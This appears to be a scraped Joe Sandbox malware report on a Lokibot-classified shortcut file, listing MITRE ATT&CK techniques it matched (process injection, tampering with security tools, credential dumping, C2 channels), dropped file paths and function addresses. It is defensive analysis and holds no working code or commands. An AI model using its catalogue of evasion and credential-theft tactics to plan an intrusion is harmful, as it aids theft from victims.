Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Comprobante.lnk.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\screens.pif.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4eyh3bmu.mud.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqa30ycs.ic0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmzi4otn.c2j.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtumicvz.4td.psm1

C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\bb7e5d0cf2dfb2b59be71d56e848e059_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GI5H1UFK6LW59IUH41EH.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\a5cebb9ded06a97e.customDestinations-ms (copy)

C:\Users\user\Desktop\screens.pif

Static File Info

General

Windows Analysis Report
Comprobante.lnk.lnk

Function 02D546C0 Relevance: 6.6, Strings: 5, Instructions: 302
COMMON

Function 0D0692BA Relevance: 4.1, Strings: 3, Instructions: 318
COMMON

Function 0D0692E0 Relevance: 4.1, Strings: 3, Instructions: 308
COMMON

Function 02D545C0 Relevance: 2.9, Strings: 2, Instructions: 388
COMMON

Function 02D5459F Relevance: 2.9, Strings: 2, Instructions: 373
COMMON

Function 02D52439 Relevance: 2.7, Strings: 2, Instructions: 245
COMMON

Function 0D06704A Relevance: 2.7, Strings: 2, Instructions: 218
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre